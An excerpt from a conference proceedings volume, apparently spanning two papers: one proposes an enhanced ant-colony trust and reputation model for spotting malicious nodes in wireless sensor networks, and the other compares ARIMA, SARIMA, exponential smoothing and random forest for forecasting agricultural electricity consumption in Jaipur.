Department of ECE (FET), Gurukula Kangri (Deemed To Be University), Haridwar 249404, India
S. Rani
Department of Computer Science and Engineering, Gulzar Group of Institutes, Khanna, Punjab
141401, India
N. Choudhary
Department of CSE, JECRC, Jaipur, India


possibility of an adversary [6] is always higher than in an indoor environment. These malevolent nodes may transmit wrong information in the network; due to malevolent nodes, the performance of the system is degraded. There are many techniques or methods to detect malicious nodes in WSNs, and cryptography is one of the techniques which protects the network from attacks or malevolent nodes. The major drawback of cryptographic techniques is their complex computation [7]. The trust and reputation model (TRM) is a creative solution for sustaining a minimum security level between two objects having transactions and interactions within a dispersed system. Many trust and reputation models were introduced in the past. Some models provide cluster head selection, secure routing, data aggregation and synchronized trust management [8–10]. In a fraudulent environment, a malevolent node assigns the maximum value to other malevolent nodes and the minimum value to benevolent nodes [11]. In the current era, the need of the hour is to enhance the data rate and security over the network. For data rate enhancement, we generally apply data compression techniques [12–17]. We propose an enhanced bio-inspired trust and reputation system which increases the security level. Our proposed approach is presented, a performance comparison between our model and the original one is carried out, and this is followed by the conclusion and future work.

2 Trust and Reputation System

Trust and reputation system (TRS) management is a creative solution for sustaining a minimum security level between two objects having transactions or interactions within a distributed system. Trust is a particular level of subjective probability with which an agent will perform a particular action, while reputation is an expectation about the behavior of an agent based on information about it or observations of its prior behavior. In most cases, these two notions can be clearly distinguished, yet they are often used interchangeably. In WSN transactions, if we define the sensors asking for services as client sensors and the sensors providing services as server sensors, then the client sensors will decide whether to have transactions with a server sensor based on its trustworthiness or reputation. A trust and reputation model is usually composed of five components: gathering information, scoring and ranking, selecting objects, having the transaction, and reward or punishment. Gathering information, the first element of a trust and reputation system, is responsible for collecting behavioral information about other objects, for example, peers, agents or paths. The information collected might come from different objects: it could be direct observation, own experience, or information provided by other nodes. Once information about an object has been properly assembled and weighed, a reputation score is estimated and given based on a certain algorithm. The main aim of this process is to provide the clients a quantifiable way to decide which server node is most trustworthy. The next step is that a client selects the most trustworthy or reputable server object in the society providing a certain service, and then interacts with it accordingly. After receiving the service provided, the client will assess the result and give a score of

satisfaction. Based on the satisfaction obtained, the final step, punishing or rewarding, is carried out. If a server node is unsuccessful in making the client satisfied with the provided service, its reputation score will be affected, and the client is less likely to have a transaction with it again.

3 Bio-inspired Trust and Reputation Model (BTRM)

BTRM-WSN [18] carries out the selection of the most trustworthy node through the most reputable path offering a certain service. It is based on a bio-inspired algorithm called the ant colony system (ACS), in which ants form paths over a graph in order to fulfill some conditions. Ants leave pheromone traces that help subsequent ants discover and follow those paths. These pheromone values help the ants discover the optimal path, since the optimal path will have the maximum amount of pheromone. When this ACS algorithm is applied to a trust and reputation system, the trustworthiness of sensors is represented by the pheromone value. In BTRM-WSN, each sensor node holds pheromone traces for its neighbors (τ ∈ [0, 1]), which determine the probability for an ant to select a path, as well as the sensor the path leads to, as a solution. In other words, τ can be considered as the trust that a sensor gives another. The steps of the BTRM algorithm are as follows:

3.1 Gathering Information

A set of artificial ants is created, and then they leave the client sensor. When an ant proceeds from a node i to a node j, it gives an instruction to these two sensor nodes to improve the pheromone value of the path between them through Eqs. (1) and (2):

$$\tau_{ij} = (1 - \varphi)\,\tau_{ij} + \varphi\,\Delta \tag{1}$$

$$\Delta = 1 + (1 - \varphi)\,(1 - \tau_{ij})\,\eta_{ij} \tag{2}$$

where τij is the pheromone value of the path between sensor i and sensor j, Δ is the convergence value of τij and ϕ is a parameter controlling the amount of pheromone left by the ants.
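As a reading aid only, the following Python sketch shows how the pheromone update of Eqs. (1) and (2) could be implemented; the function name and the example values of ϕ and η are illustrative assumptions, not values prescribed by BTRM-WSN.

```python
def pheromone_update(tau_ij, phi, eta_ij):
    """Update the pheromone (trust) of edge i -> j following Eqs. (1) and (2).

    tau_ij : current pheromone value in [0, 1]
    phi    : parameter controlling the amount of pheromone left by the ants
    eta_ij : heuristic value associated with the edge (assumed input)
    """
    delta = 1 + (1 - phi) * (1 - tau_ij) * eta_ij  # Eq. (2): convergence value
    return (1 - phi) * tau_ij + phi * delta        # Eq. (1): updated pheromone

# Example with illustrative values: an ant traverses an edge whose current trust is 0.5.
print(pheromone_update(tau_ij=0.5, phi=0.01, eta_ij=0.8))
```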
When an ant moves in the network searching for the most trustworthy path to a server providing a good service, it must decide whether to stop and return the solution to the client or continue to discover another one, based on the reputability of the server that is discovered. When ant k reaches a sensor s, several situations may occur. The first is that sensor s has more neighbors not visited by ant k; then, k estimates the average pheromone value (τk) of the path followed by ant k from the

client up to the sensor s. If τk is greater than the prescribed transition threshold TraTh, then ant k stops and returns the solution, or vice versa. Another situation is that s does not provide any services. If sensor s has more neighbors not visited by ant k, then k decides the next node to move to. If all the neighbors of sensor s have been visited, then ant k reaches a dead end. It has to go back along the route that it has formed until it reaches a sensor offering the requested service, or a sensor not offering the requested service but having more neighbors not visited yet [19].

3.2 Score and Rank

The client will test and determine the quality of the solution brought back by each launched ant. The quality of a path is computed by Eq. (3):

$$Q(S_k) = \frac{\tau_k}{\mathrm{Length}(S_k)^{PLF}} \cdot \%A_k \tag{3}$$

Here, τij is the pheromone value of the path between sensor i and sensor j, Δ is the convergence value of τij and ϕ is the amount of pheromone traces left by the ants. Sk designates the solution brought back by ant k; Q(Sk) defines the quality of path Sk; τk designates the average pheromone of path Sk found by ant k; PLF ∈ [0, 1] defines a path length factor; and %Ak denotes the percentage of ants that have selected the same solution as ant k. After estimating the path quality of all the solutions brought back by the ants, the client selects the path with the maximum score and keeps it as the Current_Best solution. Then, the client compares its quality with the best solution (Global_Best) found in earlier transactions. If the Current_Best solution is better, the client replaces the previous Global_Best with the Current_Best solution. Then, an extra ant is sent to improve the pheromone value of the current Global_Best.
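Purely as an illustration of the scoring step (the data layout and values are assumptions), a minimal Python sketch of Eq. (3) and the Current_Best/Global_Best comparison is:

```python
def path_quality(avg_pheromone, length, pct_same_solution, plf=1.0):
    """Eq. (3): Q(S_k) = avg_pheromone / length**PLF * %A_k."""
    return avg_pheromone / (length ** plf) * pct_same_solution

# Each returned solution: (average pheromone of the path, hop count, fraction of ants choosing it).
solutions = [(0.82, 3, 0.4), (0.78, 2, 0.6)]   # illustrative values
current_best = max(solutions, key=lambda s: path_quality(*s))

global_best = (0.70, 4, 0.5)                    # best solution from earlier transactions
if path_quality(*current_best) > path_quality(*global_best):
    global_best = current_best                  # replace Global_Best with Current_Best
```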

3.3 Ants Transaction

After the client selects the Global_Best solution, it will have a transaction with the selected sensor and, after receiving the service, will compare it with the default service which the client expects to obtain. There might be two conditions: first, the selected server sensor might be completely trustworthy and provide the accurate service as it is assumed to, or it could be totally malicious and provide a highly different service. In the former condition, the client is convinced, and a satisfaction value (Sat) is obtained as a random number between PunTh and 1; while in the latter condition, the satisfaction value (Sat) is obtained as a random number between 0 and PunTh, as the client is considered unsatisfied. PunTh is a predefined punishment threshold value.

3.4 Punish and Reward

A client will request the desired service from what it considers to be the most reputable server through the most trustworthy path. Then, punishment or reward will be given to all the connections in this path based on whether the client is satisfied with the service provided by the server. This is done by increasing or decreasing the pheromone value of the path [20–23].

4 Enhanced Bio-inspired Trust and Reputation Model

This section introduces an enhanced bio-inspired trust and reputation system inspired by the BTRM described in the prior section. In the EBTRM algorithm, we modify the parameter values of the bio-inspired algorithm. The flow chart and the improvements to the BTRM algorithm (EBTRM) are shown in Fig. 1.

4.1 EBTRM Algorithm

As described earlier, the criterion that BTRM-WSN uses to determine whether a sensor is trustworthy is the quality of the solution route from the client sensor to the selected sensor. Similarly, the quality of each solution is estimated based on the average pheromone value. This approach has been proven to be effective, and the performance of the system may be improved if the condition of the server sensors is taken into account and some aspects of the original system are modified. In the first modification, in order to make the system more secure, we need to increase the path quality of the system. In the EBTRM algorithm,

$$Q(S_k) = \frac{\tau_k}{\mathrm{Length}(S_k)} \cdot \%A_k$$

where PLF = 1, so those paths are selected which are as short as possible. In the second modification, we enhance the radio range and take the maximum radio range, because a larger radio range provides better security: if the radio range is large, two nodes can communicate directly, but if it is small they cannot communicate directly with each other, and the possibility of interference by a malicious node is increased. The last modification is in the value of q0 (= 0.6335); the probability of deterministically choosing the most trustworthy next node is increased, which increases the accuracy of the system.
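For readers unfamiliar with q0, the sketch below illustrates the standard ACS pseudo-random proportional rule that such a parameter typically controls; this is general ACS background, not code taken from EBTRM, and weighting the random choice by pheromone alone is a simplifying assumption.

```python
import random

def choose_next_node(neighbors, pheromone, q0=0.6335):
    """neighbors: candidate next sensors; pheromone: dict mapping sensor -> tau in [0, 1]."""
    if random.random() < q0:
        # Exploitation: deterministically pick the most trustworthy neighbor.
        return max(neighbors, key=lambda n: pheromone[n])
    # Exploration: pick a neighbor at random with probability proportional to its pheromone.
    return random.choices(neighbors, weights=[pheromone[n] for n in neighbors], k=1)[0]

# Example with illustrative trust values: a larger q0 makes the deterministic choice more likely.
print(choose_next_node(["s1", "s2", "s3"], {"s1": 0.9, "s2": 0.4, "s3": 0.7}))
```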

[Flow chart: ants are launched; Q(Sk) is compared with Q(Current_Best) and Q(Current_Best) with Q(Global_Best); pheromone local and global updating are performed before termination.]
Fig. 1 Flow chart of EBTRM

5 Simulation Results

In our proposed work, we consider ten networks composed of 10–100 sensor nodes, each for 10 executions, in a two-dimensional area. Sensor nodes in a cluster with a particular radio range transmit the data to the cluster head and then to the base station within the entire network. In a collusion network, every malicious node gives the maximum rating to every other malicious node and the minimum rating to every benevolent one. We used the Java-based, event-driven TRMSim-WSN [24] simulator, version 0.5, for WSNs, which allows researchers to simulate and represent random network distributions and provides statistics of different data dissemination policies, including the provision to test different strategies of trust and reputation models. Many settings, such as collusion, oscillating and dynamic networks, the percentage of nodes, malicious nodes and so forth, can be implemented and tested over it. In our experiment, we concentrated on the collusion network and enhanced the accuracy of the

Table 1 Parameters of BTRM and EBTRM

Parameters BTRM values EBTRM values
Phi 0.01 0.01
Rho 0.87 0.87
q0 0.45 0.6335
Num ants 0.35 0.35
Num iterations 0.59 0.59
Alpha 1.0 1.0
Beta 1.0 1.0
Initial pheromone 0.85 0.85
Punishment threshold 0.48 0.48
Path length factor 0.71 1
Transition threshold 0.66 0.66
Radio range 12 m 50 m

BTRM algorithm in the collusion network. Table 1 shows the simulation parameters of the BTRM and EBTRM algorithms.
TRMSim-WSN 0.5 is a Java-based trust and reputation model simulator aimed at providing an easy way to test a trust and reputation model (BTRM) over WSNs and to compare it with EBTRM. We design a WSN template using the network parameter settings in TRMSim-WSN as: clients = 15%, number of nodes = 100, number of networks = 10, number of executions = 10. Then, the simulator randomly creates WSNs for the experiments based on this template.

5.1 Accuracy with Varying Number of Malicious Nodes

In our work, we have used the concept of accuracy to evaluate the reliability and level of security provided by the trust and reputation system; it is represented by the percentage of times that trustworthy sensors are successfully selected out of the total number of transactions. A better trust and reputation system should have good control over the negative influence that the malicious nodes have on the WSN. Figure 2 shows the comparison of the accuracy of the BTRM and EBTRM algorithms with a varying number of malicious nodes.

5.2 Path Length with Varying Number of Malicious Nodes

Path length is the average number of hops leading to the most trustworthy sensors which are selected by the client in a WSN applying a certain type of trust and reputation system. It is assumed that a smaller average path length indicates a better performance in efficiency and

Fig. 2 Graphical representation of accuracy of BTRM and EBTRM

Fig. 3 Graphical representation of path length of BTRM and EBTRM

ease in searching for trustworthy sensors of a trust and reputation system. Figure 3 represents the path length of the BTRM and EBTRM algorithms graphically.

5.3 Energy Consumption with Varying Number of Malicious Nodes

Energy consumption of the network is the overall energy consumed in: client nodes
sending request messages, server nodes sending response services, energy consumed

Fig. 4 Graphical representation of energy consumption of BTRM and EBTRM

by malicious nodes which provide bad services, relay nodes which do not provide services, and the energy to execute the trustworthy sensor searching process of a certain trust and reputation system. For WSNs, a major problem for researchers is how to effectively reduce energy consumption. Figure 4 shows that EBTRM has the lowest energy consumption.

6 Conclusions

Our proposed EBTRM system successfully increases the accuracy of the trust and reputation system, and therefore the level of security of the original BTRM-WSN, without sacrificing its advantages in finding trustworthy sensors efficiently; the extra amount of energy for those add-ons is acceptable. EBTRM is proven to be able to accurately distinguish benevolent sensors from malicious sensors and thus protect WSNs from attackers. Most importantly, the level of security it provides is not influenced by the number of attackers as much as that of its two competitors. When the network is in a relatively secure state, it becomes more complicated and less energy efficient to search for trustworthy sensors because of the extra conditioning and computation; overall, the modifications to BTRM are successful. Our proposed EBTRM provides a better solution for WSNs where a high level of security is required, while future work will keep developing the algorithms for searching trustworthy sensors to improve both the ease of finding trustworthy sensors and the energy efficiency. EBTRM provides a higher level of security for WSNs without sacrificing the efficiency of the original approach and does not require a huge amount of extra energy.

References

1. Farahani, S. (2008). Zig Bee Wireless Networks and Transceivers. Elsevier.


2. Alkalbani, A., Mantoro, T., & Tap, A. O. Md. (2012). Improving the lifetime of wireless sensor
networks based on routing power factors. In Networked Digital Technologies, Communications
in Computer and Information Science (vol. 293, pp. 565–576).
3. Chen, H., Wu, H., Zhou, X., & Gao, C. (2007). Reputation based trust in wireless sensor
networks. In Proceedings of the International Conference on Multimedia and Ubiquitous
Engineering (pp. 603–607).
4. Chong, C. Y., & Kumar, S. P. (2003). Sensor Networks: Evolution opportunities and challenges.
Proceedings of the IEEE, 91(8), 1247–1256.
5. Akyildiz, I. F., Sankarasubramaniam, W. Su., & Cayirci, E. (2002). A survey on sensor
networks. IEEE Communications Magazine, 40(8), 102–114.
6. Hurt, J., Lee, Y., Yoont, H., Choi, D., & Jin, S. (2005). Trust evaluation model for wireless sensor
networks. In Proceedings of the seventh International Conference on Advanced Communication
Technology (pp. 491–496).
7. Jing, Q., Tang, L. Y., & Chen, Z. (2008). Trust management in wireless sensor networks.
Journal of Software, 19(7), 1716–1730.
8. Hur, J., Lee, Y., Hong, S., & Yoon, H. (2005). Trust based secure aggregation wireless sensor
networks. In Proceedings of the third International Conference on Computing, Communications
and Control Technologies (Vol. 3, pp. 1–6).
9. Crosby, G. V., Pissinou, N., & Gadze, J. (2006). A framework for trust based cluster head
election in wireless sensor networks. In Proceedings of the Second IEEE Workshop on
Dependability and Security in Sensor networks and Systems (pp. 13–22).
10. Sun, Y. L., Yu, W., Han, Z., & Liu, K. J. R. (2006). Information theoretic framework of
trust modeling and evaluation for ad-hoc networks. IEEE Journal on Selected Areas in
Communications, 24(2), 305–317.
11. Verma, V. K., Singh, S., & Pathak, N. P. (2014). Collusion based realization of trust and
reputation models in extreme fraudulent environment over static and dynamic wireless sensor
networks. International Journal of Distributed Sensor Networks, Hindawi Publication.
12. Arya, V., & Singh, J. (2016). Image compression algorithm using two dimensional discrete
cosine transform. Journal Interdisciplinary Research(IJIR), 2(8). ISSN: 2454–1362.
13. Arya, V., & Singh, J. (2016). Robust image compression using two dimensional discrete cosine
transform. International Journal of Electrical and Electronics Research, 4(2), (187–192). ISSN
2348–6988 (online).
14. Arya, V., Singh, P., & Sekhon, K. (2016). Medical image compression using two dimensional
discrete cosine transform. International Journal of Electrical and Electronics Research, 3(1),
(156–164). ISSN 2348–6988 (online).
15. Arya, V., Singh, P., & Sekhon, K. (2013). RGB image compression using two dimen-
sional discrete cosine transform. International Journal of Engineering Trends and Technology
(IJETT), V4(4), 828–832. ISSN:2231-5381.
16. Gupta, O. P., & Rani S. (2013). Accelerating molecular sequence analysis using distributed
computing environment. International Journal of Scientific & Engineering Research–IJSER.
17. Rani, S., & Gupta, O. P. (2016). Empirical analysis and performance evaluation of various GPU
implementations of protein BLAST. International Journal of Computer Applications, 151(7),
22–27.
18. Marzi, H., & Lia, M. (2013). An enhanced bio-inspired trust and reputation model for WSN.
In The fourth International Conference on Ambient Systems, Networks and Technologies
(pp.1159–1166). Elsevier.
19. Marmol, F. et al. (2011). Providing trust in WSNs using a bio-inspired technique (pp. 163–180).
Springer science plus business media
20. Pan, Y., Yu, Y., & Yan, L. (2013). An improved trust model based on interactive ant algorithms
and its applications in wireless sensor networks. International Journal of Distributed Sensor
Networks. Hindwai Publishing Corporation, 2013.

21. Karthik, S., Vanitha, K., & Radhamani, G. (2011). Trust Management Techniques in Wireless
Sensor Networks: An Evaluation. IEEE.
22. Dorigo, M., Stuzle, T. (2004). Ant Colony optimization. Bradford Book.
23. Ukil, A. Trust and Reputation Based Collaborating Computing in Wireless Sensor Networks.
In Second International Conference on Computational Intelligence, Modelling and Simulation,
24. Marmol, F. et al. (2009). TRMSim-WSN, trust and reputation models simulator for WSNs. In
IEEE Communication Society.
Analytical Machine Learning
for Medium-Term Load Forecasting
Towards Agricultural Sector

Megha Sharma, Namita Mittal, Anukram Mishra, and Arun Gupta

Abstract The economic growth of any country depends upon the available resources and their proper management. All the sectors, residential, industrial, commercial or agricultural, require sufficient and reliable energy services. Electricity is one of the most important forms of energy and cannot be replaced by any other energy input. The agriculture sector has an important role in the process of foodstuff production; non-food products such as tobacco and jute also contribute to the economy. Electricity plays an important role in irrigation in the agricultural sector. Proper management of the energy consumption for irrigation is required for the utilization of the existing resources. So, there is a need for predicting the future consumption of electricity in the agricultural sector. Medium-term load forecasting is used for predicting weeks to years ahead electricity consumption. In the proposed work, statistical and machine learning based algorithms are used to predict the one year ahead electricity consumption in the agricultural sector. Time series-based statistical techniques like auto-regressive integrated moving average (ARIMA), seasonal ARIMA (SARIMA) and exponential smoothing (ES), and a machine learning based approach like random forest (RF), are used to forecast medium-term load consumption in the agricultural field. The SARIMA model shows the minimum root mean square percentage error (RMSPE). The result shows that statistical approaches like SARIMA and ES outperform random forest.

M. Sharma (B) · N. Mittal


Department of Computer Science & Engineering, Malaviya National Institute of Technology,
Jaipur, India
e-mail: 2018rcp9099@mnit.ac.in
N. Mittal
e-mail: nmittal.cse@mnit.ac.in
A. Mishra · A. Gupta
Genus Power Infrastructures Limited, Jaipur, India
e-mail: anukram.mishra@genus.in
A. Gupta
e-mail: arun.gupta@genus.in


Keywords Load forecasting · Time-series analysis · SARIMA · Exponential smoothing · Machine learning · Agriculture sector

1 Introduction

Electricity load forecasting is required for consumers, utilities, distributors, and generators, as accurate prediction plays an imperative role in planning at each level. In the current scenario, when a pandemic and lockdown occurred all over India, many consumers faced the issue of a huge amount in their bill. The reason behind this is that the utility estimated the bills from the consumption pattern of the consumer over the last 4 months and then averaged it. To resolve similar kinds of issues, a proper forecasting technique with high accuracy is required. Energy demand forecasting is important, but it is a difficult task in the agricultural field due to the multiple factors on which it depends and their varying nature. In the agriculture sector, existing work on forecasting energy demand depends on trends and factors relevant to national averages, although energy demand varies with weather, crops, area, farm machinery and technologies, pump sets, and ground water. Concerning enhancement of the yield, proper management of irrigation is required. As pumped irrigation depends on electricity, there is a need to forecast electricity consumption in the agricultural sector [1].
There has been rapid growth in electricity consumption in every sector, and the agriculture sector has also seen sharp growth. The agriculture sector accounted for 17.49% of the total consumption of electricity in the year 2018–19 [2]. There is an annual increase in electricity consumption in the agriculture sector, and it changes according to the crop seasons. The supplied electricity is subsidized or in some places free, and most of the areas are unmetered. Farmers need incentives for growing appropriate crops, but because of the unmetered supply they are wrongly blamed for high power consumption, and they face the problem of poor-quality electricity. Most of the electricity provided in the agriculture sector is subsidized. If proper forecasting is done in the agriculture sector, then it provides benefits to farmers, the utility, and the government. To truly estimate the electricity consumption, meters need to be deployed in the field. In this paper, both flat and metered electricity consumption are considered to estimate future consumption.
The sector-wise energy consumption in India is shown in Fig. 1. As per the 2011 census, 61.5% of the population of India is rural and dependent on agriculture, and this sector contributes 14.4% to the Indian GDP (as per the 2018–19 economy survey) [3]. If proper forecasting of the electricity consumption is done according to the season, then it creates a profit for the farmer and helps to utilize the resources available in that season.
There are four types of load forecasting on the basis of the time horizon: very short-term load forecasting (VSTLF) for predicting minutes to an hour ahead load consumption, short-term load forecasting (STLF) for predicting a day to a week ahead load consumption, medium-term load forecasting (MTLF) for predicting the load two weeks to three years ahead, and long-term load forecasting (LTLF)

Fig. 1 Category-wise energy consumption in India 2001–2019[3]

to predict the load more than three years ahead [4]. In this paper, we predict the one year ahead electricity consumption in the agricultural sector using different types of forecasting techniques.
Many forecasting techniques exist; they are classified into two parts [4, 5]:
(a) Statistical approach: the statistical approach is further classified into time series analysis and regression techniques [6].
(b) Intelligent approach: fuzzy logic, machine learning and deep learning techniques.
In this paper, we focus on time series analysis, in which the projected consumption depends on its previous historical consumption. Four techniques are applied to the dataset: auto-regressive integrated moving average (ARIMA), seasonal ARIMA (SARIMA), exponential smoothing (ES) and random forest (RF); among these, SARIMA shows the best results.
This paper is organized as follows. Section 2 describes the work done to forecast electricity consumption based on different indicators. Section 3 provides details of the proposed methodology used for forecasting the consumption pattern. Section 4 contains information regarding the results achieved by the different forecasting techniques. Section 5 provides the conclusion and future work.

2 Literature Review

In this section, a detailed view of the work done on energy consumption forecasting is given. Energy indicators are used to identify the trends and key drivers to optimize

energy consumption. Energy indicators are selected and decided by their correlation coefficient analysis with the target output, and their accuracy depends on the performance. Three types of energy indicators are defined: social, economic, and environmental, according to "Energy Indicators for Sustainable Development: Guidelines and Methodology" [7].
In [8], economic indicators are used to forecast electricity consumption in the agricultural sector. The electricity prediction depends on the population, per capita GDP, and farming land. An artificial neural network is applied to forecast electricity, where the input neurons are the economic indicators and the output variable is the AS-EC (agriculture sector electricity consumption).
In [9], an IoT-based approach is proposed that diagnoses, monitors, and controls the factors that affect crop yield and optimizes the requirement of irrigation. The authors considered temperature, humidity, and soil moisture as parameters that need analysis for optimal watering. Sensors are implemented in the field to measure the soil moisture; accordingly, the future water need of the crop is analysed.
In [10], an ARIMA model is used to forecast electricity consumption in an institution, and it is proposed that the monthly time series gives better results than bi-monthly and quarterly time series. The dataset is related to a health care institute. Finally, an equation is given based on the selected model. The model which has the minimum SSE and MPE error is selected to forecast electricity consumption.
A season-based model is given in [11], in which short-term load forecasting is performed using ARIMA, SARIMA, a neural network, an RNN, and an RNN with average true range (ATR). The model performances are compared, and the best model, which gives the fewest errors, is selected for the energy management system. The models forecast for three seasons, May-June, July-September and October-December; among the five models, the RNN with ATR gives better results for the different seasons, but every season has a different model to forecast future values.
An ARIMA model is used to forecast seven-year electricity consumption in
different sectors. Each sector has a different model of ARIMA (p,d,q) of auto regres-
sion, difference, and moving average. This paper considers domestic, commercial,
and industrial sectors, and the agricultural sector is untouched [12].
In [13], a model is proposed for short-term load forecasting using random forest and the multi-layer perceptron to predict one week ahead electrical load data.

3 Material and Methods

3.1 Dataset

The monthly electricity consumption data is collected from Jaipur Vidyut Vitran Nigam Limited (JVVNL). In data pre-processing, we select only agricultural flat and metered energy consumption data. The data are collected monthly from January 2015 to April 2020. We train the model from January 2015 to December 2019

Fig. 2 Auto ARIMA model for forecasting electricity consumption where x-axis shows the year
and y-axis represent electricity consumption in Lakh Unit

and test the model from Jan 2020 to April 2020, and forecast the electricity consumption pattern for the next year.

3.2 Methodology

3.2.1 ARIMA Model

ARIMA model is the combination of moving average and auto regressive with inte-
grated differencing. The accurate load forecasting for a time lag or multiple time lag in
the future can be predicted using historical consumption data. Firstly, transform input
data into stationary time series data and then using auto correlation function (ACF)
and partial ACF to get the order of auto regressive (AR), moving average (MA),
seasonal AR (SAR), and seasonal MA (SMA). Moving Average (MA) process of
order q has an ACF that cut off after q lags. Partial ACF (PACF) helps to obtain the
order of an AR(p) process, an auto regressive (AR) process of order p, an AR(p), has
a PACF that cut off after p lags. The aim of transforming into stationary time series
because one part of the time series is equal to the other part of the time series [10].
One year ahead forecasted pattern of electricity consumption is shown in Fig. 2.
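As an illustrative sketch only (the library choice, file and column names are assumptions, not from the paper), an ARIMA model of this kind can be fitted in Python with statsmodels:

```python
import pandas as pd
from statsmodels.tsa.arima.model import ARIMA

# Hypothetical monthly consumption series (Lakh Units), indexed by month.
series = pd.read_csv("agri_consumption.csv", parse_dates=["month"],
                     index_col="month")["consumption"]
train = series[:"2019-12"]              # Jan 2015 - Dec 2019 training window

model = ARIMA(train, order=(0, 1, 9))   # ARIMA(0,1,9), the order reported in Sect. 4.1
fit = model.fit()
print(fit.forecast(steps=12))           # one year ahead forecast
```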

3.2.2 SARIMA Model

SARIMA(p,d,q)(P,D,Q)s has two parts: a non-seasonal part (p,d,q) and a seasonal part (P,D,Q)s [5].
a. Time series analysis and transformation to remove trend and variance.
b. ACF to decide the order of MA(q), SMA(Q).
c. PACF to decide the order of AR(p).
d. Select the model which has the least AIC (Akaike Information Criterion), the least SSE error, and passes the Ljung-Box Q-statistics test.
e. Estimate and fit the model to the time series.

Fig. 3 a Monthly electricity consumption, b log transformation of time series data, c difference of
the log transformation to remove trend, d stationary form of data

Step-1: Transform the time series data into a stationary time series using differencing and log transformation, removing the trend and seasonality. The transformation of the monthly electricity consumption data into stationary data is given in Fig. 3, where the X-axis shows time and the Y-axis shows electricity consumption (EC) in the agricultural sector.
Step-2: The ACF and PACF at different time lags are able to decide the degrees of the moving average and auto-regressive terms. The degree of MA determined using the ACF is 1, and there is a seasonal component after lag 12, so the degree of Q is 5. The degree of p is 0 or 1 and the degree of P is 1, as decided by the PACF.
Step-3: Model selection: the best model among (0,0,0,0,0,0) to (1,1,1,1,1,5) is chosen on the basis of the AIC and SSE values. The model ARIMA (1,1,1)(0,1,2) gives the minimum AIC value and a low SSE. Then, the model is fitted to forecast future values.
Step-4: The Ljung-Box test for residuals shows there is no correlation among the residuals.
Step-5: Fit the model to the time series: the best model, which has the least AIC and SSE values, is selected for forecasting the electricity consumption. The pattern of electricity consumption forecasted by the SARIMA model is shown in Fig. 4.
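A minimal sketch of fitting the selected seasonal model with statsmodels is shown below; the seasonal period of 12 follows from the monthly data, while the data source and variable names are illustrative assumptions.

```python
import pandas as pd
from statsmodels.tsa.statespace.sarimax import SARIMAX

series = pd.read_csv("agri_consumption.csv", parse_dates=["month"],
                     index_col="month")["consumption"]
train = series[:"2019-12"]

sarima = SARIMAX(train,
                 order=(1, 1, 1),                # non-seasonal (p, d, q)
                 seasonal_order=(0, 1, 2, 12))   # seasonal (P, D, Q, s) with s = 12 months
fit = sarima.fit(disp=False)
print(fit.aic)                                   # criterion used for model selection
print(fit.forecast(steps=12))                    # one year ahead forecast
```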

3.2.3 Exponential Smoothing

Exponential smoothing is performed by the Holt-Winters function, which is based on level, trend and seasonality parameters α, β and γ, respectively [14]. The actual versus

Fig. 4 Forecasted Model using SARIMA

Fig. 5 Actual v/s forecasted graph of electricity consumption, where the black line represents
actual value and the red line shows the predicted value

forecasted representation of the electricity consumption using the Holt-Winters model is shown in Fig. 5, where the black line shows the actual electricity consumption and the red line shows the predicted electricity consumption.
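A hedged sketch of the corresponding Holt-Winters fit in Python is given below; the statsmodels call, additive components and data names are illustrative assumptions, while the reported parameters (alpha ≈ 0.189, beta = 0, gamma = 1) come from the paper's Holt-Winters run.

```python
import pandas as pd
from statsmodels.tsa.holtwinters import ExponentialSmoothing

series = pd.read_csv("agri_consumption.csv", parse_dates=["month"],
                     index_col="month")["consumption"]
train = series[:"2019-12"]

# Triple exponential smoothing with a 12-month season (Holt-Winters).
hw = ExponentialSmoothing(train, trend="add", seasonal="add", seasonal_periods=12)
hw_fit = hw.fit()                        # estimates the level, trend and seasonal parameters
print(hw_fit.params["smoothing_level"])  # alpha
print(hw_fit.forecast(12))               # one year ahead forecast
```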

3.2.4 Random Forest

One of the most important uses of machine learning [15] is that machine learning algorithms like random forest (RF) can be utilized to identify the important features. In time series data, the important features are the time lags. RF creates a new dataset with 12 months of lag values to predict the current observation and is used to identify which of this set of values is most important for predicting the current value. The value from two time periods ago, t-2, is the most important, followed by the value at the present time t, as given in Fig. 6. The most important time lag observations which predict the current value of the response variable are t, t-10, t-9 and t-2.
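A minimal sketch of this lag-feature construction and importance ranking with scikit-learn is shown below; the 12-lag window follows the paper, while the data source, column names and hyperparameters are illustrative assumptions.

```python
import pandas as pd
from sklearn.ensemble import RandomForestRegressor

series = pd.read_csv("agri_consumption.csv", parse_dates=["month"],
                     index_col="month")["consumption"]

# Build a supervised dataset: 12 monthly lag values as predictors of the current month.
frame = pd.concat({f"t-{k}": series.shift(k) for k in range(1, 13)}, axis=1)
frame["t"] = series
frame = frame.dropna()

X, y = frame.drop(columns="t"), frame["t"]
rf = RandomForestRegressor(n_estimators=500, random_state=0).fit(X, y)

# Rank the lags by importance, as illustrated in Fig. 6.
print(pd.Series(rf.feature_importances_, index=X.columns).sort_values(ascending=False))
```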

Fig. 6 Random variable with 12 months lag values

4 Experimental Result and Discussion

4.1 The Experimental Result Using ARIMA Model

The forecasted value of electricity consumption using the ARIMA(0,1,9) model is represented in Fig. 7. Parameters such as the moving average coefficients of the ARIMA model are given in Table 1.

Fig. 7 Actual and forecasted electricity consumption using auto ARIMA model

Table 1 Parameter estimation using ARIMA(0,1,9) model

Coefficient Value Standard error
ma1 −0.5485 0.1359
ma2 −0.2382 0.1391
ma3 −0.5343 0.1510
ma4 0.5229 0.1515
ma5 0.0366 0.1489

Table 2 Coefficient and standard error of model SARIMA (1,1,1)(0,1,2)

Coefficient Value Standard error
ar1 0.6381 0.1224
ma1 −0.9999 0.0528
sma1 −0.3094 0.2184
sma2 0.9956 0.8695

Fig. 8 Actual and forecasted electricity consumption using SARIMA model

4.2 The Experimental Result Using Seasonal ARIMA Model

The electricity consumption is affected by the months/seasons. The coefficients and standard errors of the model SARIMA (1,1,1)(0,1,2) are shown in Table 2. The two year ahead forecasted electricity consumption pattern is given in Fig. 8, where the blue line represents the forecasted consumption and the black line represents the actual electricity consumption.

4.3 The Experimental Result Using Exponential Smoothing Model

Smoothing parameters: alpha = 0.1892999, beta = 0, gamma = 1, where alpha represents the level; beta represents the trend, and its value is 0, so the series does not depend on the trend; gamma represents the seasonality, which has the highest effect.

Fig. 9 Actual and forecasted electricity consumption using exponential smoothing



Table 3 Coefficients of parameters using Holt-Winters model

Time series model parameters
a 20,565.09208   b 51.83786   S1 11,889.77579
S2 15,912.37364   S3 19,475.89710   S4 −16,390.91766
S5 −13,676.23587   S6 −12,675.19334   S7 −7218.14823
S8 −4514.08110   S9 1980.70777   S10 1315.53855
